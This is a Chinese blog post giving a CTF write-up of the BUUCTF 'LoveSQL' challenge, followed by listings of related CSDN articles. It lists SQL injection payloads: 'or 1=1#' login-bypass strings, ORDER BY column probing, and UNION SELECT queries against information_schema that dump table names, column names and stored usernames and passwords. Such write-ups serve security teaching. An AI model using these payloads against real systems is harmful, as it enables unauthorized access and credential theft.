BUU sql注入-[极客大挑战 2019]LoveSQL

最新推荐文章于 2024-04-19 20:49:57 发布
最新推荐文章于 2024-04-19 20:49:57 发布
阅读量3k 收藏 1
点赞数 2
分类专栏: BUUCTF writeup 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ivyyyyyy1/article/details/120816225
版权

一、题目

 

梅开二度属于是

 直接操作

二、解题

1. 检测注入类型

我们用两个万能密码来检测

1 or 1=1#
1' or 1=1#

第一种万能密码对应检测的是数字型注入,第二种是字符型注入(因为字符通常用两个 ' 来标记,在1之后加 ' 构成闭合)

 

 这里我们测试结果是用第二种万能密码登录成功,那么可以判断是字符型注入

2.  注入连招(查数爆库爆表爆列)

使用union select操作

1' order by 3#

1' order by 4#

 

输入3不报错,到4的时候报错,那么列数就为3 

再判断回显位置

1' union select 1,2,3#

可知回显位为2,3

开始爆库

1' union select 1,database(),version()#

 

 爆表

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

 

我们选l0ve1ysq1这个表来爆列

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#

 

 最后就是把这些列的内容爆出来

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

 

拿到flag 

 三、总结

 1. 这道题考了比较基本的sql注入技巧,主要是使用联合查询的那一套

 2. information_schema这张数据表保存了MySQL服务器所有数据库的信息。如数据库名,数据库       的表,表栏的数据类型与访问权限等。再简单点,这台MySQL服务器上,到底有哪些数据库、       各个数据库有哪些表,每张表的字段类型是什么,各个数据库要什么权限才能访问,等等信息       都保存在information_schema表里面。(来源:百度知道)table_schema是数据库的名称,       table_name是具体的表名,查列时要用and将这两条的信息连起来

1vyyyyyy
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku ctf 实战2-注入
qq_42777804的博客
08-08 2701
     进去之后发现       wtf!?     这个怎么可以注入  !?????? 经过不断的点击发现     有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来      正常的数字型注入   利用联合查询   http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20s...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
sql注入万能密码
05-19
sql注入万能密码 全部的万能代码 如"or "a"="a 等等很多
SQL注入作业
在这里,你可以了解到关于C++,数据结构,Linux等知识点
04-19 1157
实际上这个过程是,admin'# 作为用户名登录后,数据库对该用户名,密码信任,实际上这个用户名被代码替换后,登录的不是admin'# ,而是admin。修改的是admin的密码,这就是二阶注入的原理。所谓的二阶注入,利用的是,数据库系统对已有信息的“信任”,将注入的用户名输入到系统后,利用这种信任,登录到数据库其他用户,比如admin'#成功注册后,但是登录的却是admin。此时,username为8 ,根据or的运算,3=3是永真式,#将后半句注释了,故这句代码执行结果永远为真,可以登录成功。
# “百度杯”CTF比赛 九月场SQLi
sinat_40845893的博客
01-02 196
“百度杯”CTF比赛 九月场SQLi 数据库注入,无逗union查询构造 求解流程: 进入题目,页面空白,查看源代码 <html> <head><title>Loading...</title></head> <body> <!-- login.php?id=1 --> </body> </html> 根据提示发送GET求login.php?id=1 welcome admin~&
CTF-web】bugku-成绩查询sql注入
Sankkl1的博客
08-17 577
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4150
ctfshow 靶场 web入门 sql注入系列
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
apachecn#apachecn-ctf-wiki#[WP/BUUCTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集.zip
09-18
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集 lfi实验室用于实践开发 LFI 。RFI和CMD注入vulns的小型PHP脚本集为什么?用于培训和测试。 你可以测试检测产品( 比如 。 漏洞扫描器),利用工具等。...
joinUs-buu2018:h5邀函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申加盟数据提交 + 微信/qq分享 #预览地址
Project-Decoder-Ring
03-27
项目解码器环 项目描述:解码器环 该应用程序具有3种不同的解码器。 1.凯撒密码是一种替换密码,其中明文中... 2.... 3.... “单位”可以是单个字母(最常见),成对的字母,字母的三元组,上述的混合形式,等等。... 屏幕截图:
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
sql注入的几种方式【网络攻防CTF】(保姆级图文)
MZH
04-26 6596
sql注入的几种方式【网络攻防CTF】(保姆级图文)
万能密码(sql注入
hk_hkl的博客
07-17 6387
万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证,此时程序所用用户输入的数据都合法的,所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的,非法入侵者正是利用这一特点来进行非法登录的。当我们在登录界面输入 【万能账】比如 a’ or true # 以后,后端会将我们输入的参数拼接到SQL中,然后去数据库中查询和密码。,所以这需要使用 a’ or 1 – a 而不是 a’ or 1 --a 其原理和 a’ or 1 # 大同小异。
SQL注入之万能密码
热门推荐
qq_46172668的博客
07-09 2万+
SQL注入之万能密码 SQL注入的万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账也可以登录后台 http://www. .com/admin/admin_login.asp 账:djlfjdslajdfj(随意输入) 密码:1‘or’1’=‘1 1. 用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。用户登录时,后台执行的数据库查询操作(SQL语句)是:【Selectuser_id,user_type,email From users Where us
BUU SQL COURSE
09-19
BUU SQL COURSE是一个SQL注入的实战演练平台。在这个平台上,你可以学习SQL注入的知识点,了解SQL注入的前置知识和一般测试步骤,并使用这些知识来解题。在注入过程中,一般需要找到注入点,闭合语句,带入语句进行爆破,爆破数据库版本、数据库名称、用户名称、表信息和字段信息等。通过这些步骤,你可以成功地解决注入问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值